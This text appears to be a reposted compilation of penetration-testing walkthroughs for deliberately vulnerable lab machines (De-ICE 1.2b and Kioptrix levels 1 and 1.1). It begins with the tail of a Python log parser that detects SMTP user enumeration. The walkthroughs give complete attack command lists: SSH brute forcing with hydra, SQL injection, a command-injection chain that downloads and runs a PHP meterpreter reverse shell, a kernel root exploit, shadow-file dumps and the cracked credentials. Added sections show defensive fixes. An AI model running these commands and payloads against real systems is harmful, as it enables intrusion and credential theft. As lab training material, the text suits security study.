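Dec 22 17:10:44 mail postfix/smtpd[2188]: NOQUEUE: reject: RCPT from mta.partner.example[203.0.113.7]: 550 5.1.1 <old.user@nosecbank.com>: Recipient address rejected: User unknown in local recipient table; from=<news@partner.example> to=<old.user@nosecbank.com> proto=ESMTP helo=<mta.partner.example>
"""

# Timestamp, rejected command (VRFY or RCPT), client IP and the probed recipient.
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?reject: (?P<cmd>VRFY|RCPT) from \S+\[(?P<ip>[^\]]+)\]"
    r".*? to=<(?P<rcpt>[^>]+)>"
)


def parse_rejects(log):
    """Group rejected VRFY/RCPT events as (time, command, recipient) per client IP."""
    events = defaultdict(list)
    for line in log.splitlines():
        m = REJECT_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # syslog lines carry no year
        events[m.group("ip")].append((ts, m.group("cmd"), m.group("rcpt").lower()))
    return events


def find_enumerators(log, window_s=300, threshold=3):
    """Clients that probe at least `threshold` distinct unknown recipients within `window_s`."""
    flagged = {}
    for ip, evs in parse_rejects(log).items():
        evs.sort()
        for i, (t0, _, _) in enumerate(evs):
            # Distinct recipients rejected in the window opening at this event.
            seen = {r for t, _, r in evs[i:] if (t - t0).total_seconds() <= window_s}
            if len(seen) >= threshold:
                flagged[ip] = {
                    "distinct_recipients": len(seen),
                    "vrfy_attempts": sum(1 for _, c, _ in evs if c == "VRFY"),
                    "first_seen": t0.strftime("%b %d %H:%M:%S"),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_enumerators(LOG).items():
        print(f"{ip}: {info}")
```

A single misaddressed message from a legitimate MTA (the 203.0.113.7 line) stays below the threshold, which is the point of counting distinct recipients per client rather than rejections overall.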

The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password; however, it would have taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.

Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the user's (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.

After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).

The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feelings towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end - databaser60).

When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. The contents of the email have been "corrupted"; however, the header of the message is still intact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.

The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input & conversion functions).

Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.

The attacker now has access to the complete system...

Game over

...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!

Game over...again

Commands

ifconfig eth0
ifconfig eth0 192.168.1.192
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.20
firefox 192.168.1.20 # customerserviceadmin@nosecbank.com
nc -v 192.168.1.20 25
HELO attacker
VRFY customerserviceadmin
mail from: attacker@slax.example.net
rcpt to: customerserviceadmin
rcpt to: csadmin
quit
wc -l /pentest/passwords/wordlists/darkc0de.lst
find / -name password.lst
wc -l /opt/framework3/msf3/data/john/wordlists/password.lst
hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output
ssh csadmin@192.168.1.20 # rocker
id
cat /etc/passwd # sysadmin, dbadmin, sdadmin, csadmin
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)
exit
cd /pentest/passwords/cupp/
python cupp.py -i # Paul, Donovin, 22121998, nosecbank
hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
ssh sdadmin@192.168.1.20 # donovin1998
id
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less # dbadmin (Fred, databaser)
exit
python cupp.py -i # Fred, databaser, nosecbank
hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
ssh dbadmin@192.168.1.20 # databaser60
id
pwd
ls -lah
cd mailserv_download/
ls -lah
cat * | less # sysadmin, New Custom Encryption for Passwords
umask 002
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' > /tmp/output
su csadmin # rocker
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output
su sdadmin # donovin1998
strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output
cat /tmp/output | sort -g
cat /tmp/output | sort -g | cut -f2-
exit
exit
exit
geany deice.java
less deice.java
javac deice.java
java deice # sysadmin - 531/{{tor/rv/A
java deice # root - 31/Fwxw+2
ssh sysadmin@192.168.1.20 # 7531/{{tor/rv/A
id
su - # 31/Fwxw+2
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
pwd
exit
pwd
ls
cat Note_to_self
ls -lAhR /home
cd /home/ftp/incoming/
ls -l
openssl -h
openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"
su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"' # 31/Fwxw+2
ls -l
cat useracc_update.csv


deice.java

import java.io.*;
//import java.util.Arrays;

public class deice
{
    public static void main(String[] args)
    {
        try
        {
            System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");

            BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
            System.out.print("[?] Username: ");
            String input=in.readLine();

            int[] output=processLoop(input);
            //System.out.println("[+] Output: "+Arrays.toString(output));

            // Turn each integer back into its ASCII character to form the password
            String outputASCII="";
            for(int i=0;i<output.length;i++) outputASCII+=(char)output[i];
            System.out.println("[+] Password: "+outputASCII);

        }
        catch(IOException e)
        {
            System.out.println("[-] IO Error!");
        }
    }

    /*input is username of account*/
    public static int[] processLoop(String input){
        int strL=input.length();
        int lChar=(int)input.charAt(strL-1);
        int fChar=(int)input.charAt(0);
        int[] encArr=new int[strL+2];
        encArr[0]=(int)lChar;

        for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);

        encArr[encArr.length-1]=(int)fChar;
        encArr=backLoop(encArr);
        encArr=loopBack(encArr);
        encArr=loopProcess(encArr);
        int j=encArr.length-1;

        for(int i=0;i<encArr.length;i++){
            if(i==j) break;
            int t=encArr[i];
            encArr[i]=encArr[j];
            encArr[j]=t;
            j--;
        }
        return encArr;
    }

    /*Note the pseudocode will be implemented with the
    root account and my account, we still need to implement it with the csadmin, sdadmin,
    and dbadmin accounts though*/
    public static int[] backLoop(int[] input){
        int ref=input.length;
        int a=input[1];
        int b=input[ref-1];
        int ch=(a+b)/2;

        for(int i=0;i<ref;i++){
            if(i%2==0) input[i]=(input[i]%ch)+(ref+i);
            else input[i]=(input[i]+ref+i);
        }
        return input;
    }

    public static int[] loopBack(int[] input){
        int ref=input.length/2;
        int[] encNew=new int[input.length+ref];
        int ch=0;

        for(int i=(ref/2);i<input.length;i++){
            encNew[i]=input[ch];
            ch++;
        }

        for(int i=0;i<encNew.length;i++){
            if(encNew[i]<=33) encNew[i]=33+(++ref*2);
            else if(encNew[i]>=126) encNew[i]=126-(--ref*2);
            else{
                if(i%2==0) encNew[i]-=(i%3);
                else encNew[i]+=(i%2);
            }
        }
        return encNew;
    }

    public static int[] loopProcess(int[] input){
        for(int i=0;i<input.length;i++){
            if(input[i]==40||input[i]==41) input[i]+=input.length;
            else if(input[i]==45) input[i]+=20+i;
        }
        return input;
    }
}


Notes

- De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!
- The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.
- I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!

That's all! See you.

HOWTO : Kioptrix - Level 1

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

Brief Overview

Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was a samba weakness, which is a quick attack straight to root.

Method

Scan network for hosts (nmap)
Scan target for running services (nmap)
Detect network shares (smbclient)
Exploit samba weakness, Trans2open (Metasploit)
Game Over

What do I need?

Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD5:8DB6CE65652880327B92150B08106EA)
VMware player OR workstation. Download here
nmap – (Can be found on BackTrack 4-R2). Download here
smbclient – (Can be found on BackTrack 4-R2). Download here
metasploit – (Can be found on BackTrack 4-R2). Download here

Walkthrough

A quick general nmap scan shows what hosts are currently on the network, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and the version of each service, and then attempts to identify the operating system (OS). The results are:

* OS: Linux v2.4.x (2.4.9-18)
* Samba: Samba smbd (workgroup: MYGROUP)

The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:

* Anonymous login
* Hostname (KIOPTRIX)
* Workgroup (MYGROUP)
* Default hidden admin shares (IPC$, ADMIN$)

The attacker then begins by starting up metasploit and searching for a known exploit. After configuring all the required settings, the attacker launches it. Very soon afterwards the attacker has a remote shell with "root" access to the system.

Commands

start-network
dhclient eth0
clear

nmap 192.168.0.* -n -sn -sP
nmap 192.168.0.111 -T4 -O -sV -sS #-sC -A -p- -v

#nmblookup -A 192.168.0.111 # Hostname
smbclient -L \\192.168.0.111 -N # What services are available on a server
clear

msfconsole
search samba
use linux/samba/trans2open
#info
show options
set RHOST 192.168.0.111
show options
exploit
#msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E #PAYLOAD=linux/x86/shell_bind_tcp

id
uname -a
cat /etc/shadow
cat /etc/issue


That's all! See you.

HOWTO : Kioptrix - Level 1.1

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

Brief Overview

Time for level 2! Like before, kioptrix is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.

This video demonstrates how code being injected into a web page results in the machine becoming compromised. Afterwards, the attacker starts exploring the system for further pieces of information.

Method

Scan network for hosts (Nmap)
Bypass login screen (MySQL Injection)
Local command execution (PHP Injection)
Upload a backdoor (PHP Meterpreter)
Gain root access (ip_append_data() local ring0 root exploit)
Game Over
Enable access to MySQL database (MySQL Injection)
Gather information (history and user credentials)

What do I need?

Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)
VMware player OR workstation. Download here
Nmap – (Can be found on BackTrack 4-R2). Download here
Metasploit – (Can be found on BackTrack 4-R2)
Internet Browser – (Firefox can be found on BackTrack 4-R2)
A Text Editor – (Kate can be found on BackTrack 4-R2)
ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)
MySQL – (Can be found on BackTrack 4-R2)

Walk through *Due to the forum's security, I'm unable to post the complete walk through*

After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show which hosts are currently "alive" on the network. Once a target IP is known, the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of each service, and then attempts to identify the operating system (OS). The results show:

* OS: Linux v2.6.x (2.6.9-30)
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)

The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name' ("admin") as the user name and, instead of entering a valid password, uses some “MySQL injection code”. This "password" causes the original MySQL statement to return true, so it logs in as the chosen user without the correct password being present. The vulnerable code is as follows:

* Original command
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";

* Expected input (user: admin, Password: 5afac8d85f):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";

* "Injected" input (user: admin, Password: ' OR 1=1 -- -):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.
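As an added illustration that is not part of g0tmi1k's post: the page's login page is PHP, so this re-creates the same query in Python against a constructed in-memory SQLite table, and runs the string-built query beside a parameterized one with the injected password quoted above.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the Kioptrix "users" table: the admin password
    # is the one quoted on the page, the john row is taken from the results.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, type TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "5afac8d85f", "Admin"),
        ("john", "66lajGGbla", "Non-admin"),
    ])
    return db

def login_vulnerable(db, username, password):
    # Same shape as the page's $query: user input is spliced into the SQL
    # text, so quote and comment characters change the statement itself.
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password='{password}'")
    return [row[0] for row in db.execute(query)]

def login_safe(db, username, password):
    # Parameterized query: the driver passes the values separately from the
    # SQL text, so ' OR 1=1 -- - is compared as a literal password string.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(query, (username, password))]

if __name__ == "__main__":
    db = make_db()
    injected = "' OR 1=1 -- -"
    # The vulnerable form matches every row (the app would log in as the
    # first one); the parameterized form matches nothing.
    print("vulnerable:", login_vulnerable(db, "admin", injected))  # ['admin', 'john']
    print("safe:      ", login_safe(db, "admin", injected))        # []
```

The vulnerable result also shows why the text later notes that an unspecified account would log in as the first user: the OR clause matches every row.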

The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server. The attacker notices that the web pages have a "php" file extension, guesses that the server supports PHP, and wonders whether a meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up metasploit to interact with the backdoor. The attacker then starts a web server which is used to host the backdoor.

The attacker now needs to transfer the backdoor onto the server in order to gain remote access to the system. As mentioned before, the admin panel allows admins to "ping". The attacker therefore tries to inject into the php file's input to run other commands instead. The vulnerable code is as follows:

* Original command
echo shll_exec( 'ping -c 3 ' . $target );

* Expected input (ip: 192.168.0.1):
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );

* "Injected" input (ip: ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php):
echo shll_exec( 'ping -c 3 ' . ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php );

The code uses “shll_exec” (PHP's shell_exec), which allows one to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded at the start; however, because ping requires an IP address to execute successfully and does not receive one, it fails. Instead the attacker has used ";", which allows commands to be executed sequentially regardless of outcome (i.e. multiple commands on the same line), which means the PHP code continues to run the attacker's commands even though “ping” failed. The attacker has "asked" to:

* Change directory to "/***" as this is writeable for the exploited user "apache".

* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.

* Then execute the code.
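An added hardening example, not from g0tmi1k's post and written in Python rather than the page's PHP (ipaddress validation and shlex.quote stand in for what escapeshellarg and input filtering would do in PHP): the target is validated as an IP address and passed to ping as its own argv entry, so the ";" chaining described above never reaches a shell.

```python
import ipaddress
import shlex
import subprocess

def ping_argv(target: str) -> list:
    """argv for the admin panel's 'ping -c 3 <target>', with the target
    validated as an IP address first. Anything else (hostnames, and in
    particular '; cmd' chains) raises ValueError before any command runs."""
    ip = ipaddress.ip_address(target.strip())
    return ["ping", "-c", "3", str(ip)]

def ping_command_string(target: str) -> str:
    """Fallback when a shell string is unavoidable: quote the argument so the
    whole value, metacharacters included, reaches ping as one literal arg
    (Python's shlex.quote plays the role of PHP's escapeshellarg)."""
    return "ping -c 3 " + shlex.quote(target)

def run_ping(target: str) -> subprocess.CompletedProcess:
    # shell=False: the argv list goes straight to exec, no shell parses it.
    return subprocess.run(ping_argv(target), shell=False,
                          capture_output=True, text=True, timeout=15)

if __name__ == "__main__":
    print(ping_argv("192.168.0.1"))          # ['ping', '-c', '3', '192.168.0.1']
    print(ping_command_string("; id"))       # ping -c 3 '; id'
    try:
        ping_argv("; id")                    # constructed injection attempt
    except ValueError as e:
        print("rejected:", e)
```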

The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.

However the exploited service (PHP) runs as a user that has limited access to the system, and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the target system's kernel version and searches for an exploit that could lead to "privilege escalation", which would allow “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs it on the target, which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional.)

As the login page requires login details, which need to be stored somewhere, the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues, as these details could be hard-coded into the source, handled by another file, or held in a database.

Once the attacker identifies that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password with which to access it. The attacker takes a copy of the login details and, since they can execute commands, uses this to their advantage by interacting with the MySQL database from the command line.

The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).

The attacker can keep using the current system to interact with the database; however, allowing direct command line access from their own machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself (localhost/127.0.0.1), therefore no external communication is allowed (as seen by "nmap" & "MySQL"). However, as the attacker can execute commands locally, they "grant all privileges" to the user "root" from the attacker's IP (which still protects access from everyone else!).

After connecting via the command line, the attacker sets about finding the real password for the admin panel instead of injecting to gain access. The attacker knows which database is used (via the source code of the login page), and browses the contents of the tables. The attacker finds 2 valid logins and tries them out. The first attempt shows what happens if the login details are incorrect, the next login is a valid but "non admin" account, and the last login is the valid admin account. When the attacker was injecting, had the admin account not been specified, the database would have logged in as the first user, which in most cases is the admin account as it is usually the first user that is created.

The attacker can also use MySQL to view files; however, just like before with PHP injection, the exploited user is a limited account with limited access to the system. It is a different user from before though, as it is now "mysql" rather than “apache”.

The attacker tests the backdoor in order to get a remote shell again. It is easier this time as they do not have to go through the hassle of injecting again. The attacker can just execute the php backdoor, this time by visiting it directly on the web server, which results in the php code being executed.

After regaining access and exploiting the system to gain root access, the attacker searches the system for ".mysql_history", which is a file that contains previously entered commands, and views its contents for the "root" account.

Commands *Due to the forums security, I'm unable to post the complete command list.*

start-network
dhclient eth0
clear

nmap 192.168.0.0/24 -n -sn -sP
nmap 192.168.0.202 -p 1-65500 -O -sS -sV -v

firefox http://192.168.0.202
-> User: admin
-> Password: ' OR 1=1 -- -

clear
msfpayload | grep PHP
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=8080 R > /var/www/backdoor.php.txt
start-apache
msfconsole
use multi/handler
search php
set PAYLOAD php/meterpreter/reverse_tcp
show options
set LHOST 0.0.0.0
set LPORT 8080
show options
exploit -j -z
* kate -> /var/www/backdoor.php.txt. Remove "#". Save.
; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php
sessions -l -v
sessions -i 1
sysinfo
shell
uname -a; cat /etc/*-release; id; w

Firefox: Search (exploit.db): Linux Kernel 2.6 -> Download #http://www.exploit-db.com/exploits/9542/
cp 9542.c /var/www/escpriv.c
* cd /tmp
* wget 192.168.0.33/escpriv.c
* gcc escpriv.c -o rootMe
* id
* ./rootMe
* id
* whoami && cat /etc/issue

* cp bd.php /var/www/html/backdoor.php # root only on folder!
^C
y #n = interact 0 && background

firefox http://192.168.0.202
; cat index.php
-> Right click -> View Source.
--> User: john
--> Password: hiroshima
--> Database: webapp
; mysql -u john -phiroshima -e "SHOW databases;"
; mysql -u john -phiroshima -e "USE mysql; SHOW tables;"
; mysql -u john -phiroshima -e "USE mysql; SELECT * FROM user;"
mysql -h 192.168.0.202 -u root
nmap 192.168.0.202 -sV -p 3306
; mysql -u root -phiroshima -e "USE mysql; GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.0.33';" #-D mysql #IDENTIFIED BY 'g0tmi1k';"
nmap 192.168.0.202 -sV -p 3306
mysql -h 192.168.0.202 -u root
SHOW databases;
USE webapp; SHOW tables;
SELECT * FROM users;
#* firefox http://192.168.0.202/
#-->Login *fail*, john, admin
SELECT load_file('/etc/passwd');
exit

firefox http://192.168.0.202/backdoor.php
sessions -i 2
shell
*UNABLE TO POST THIS LINE OF CODE. SEE BLOG POST*
* ** /***; ./rootMe
* cat /root/.mysql_history
* cat /etc/shadow

* whoami && cat /etc/issue


#---------------------------------------------------------------------
MySQL->history: root:Ha56!blaKAbl [???]
MySQL->users: root:hiroshima [hash: 5a6914ba69e02807]
MySQL->users: john:hiroshima [hash: 5a6914ba69e02807]
MySQL->WebApp: admin:5afac8d85f [Type: Admin]
MySQL->WebApp; john:66lajGGbla [Type: Non-admin]
Shadow: root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
Shadow: john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
Shadow: harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::
#---------------------------------------------------------------------


Notes

- When meterpreter is being hosted on the attacker's system, the file extension is “.txt”, therefore it does not get executed like a php file would when fetched with wget from the target's system.
- The “document root” folder is only writeable by “root”.
* The attacker did not have to kill the remote shell and could have executed it in there; however this method demonstrates what to do if the backdoor failed to work or if the attacker did not wish to use one for whatever reason.
- When connecting to MySQL remotely, a password is not required because when executing the "GRANT ALL PRIVILEGES" statement it did not include "IDENTIFIED BY 'g0tmi1k'" after the IP address. This would set the password to "g0tmi1k".

That's all! See you!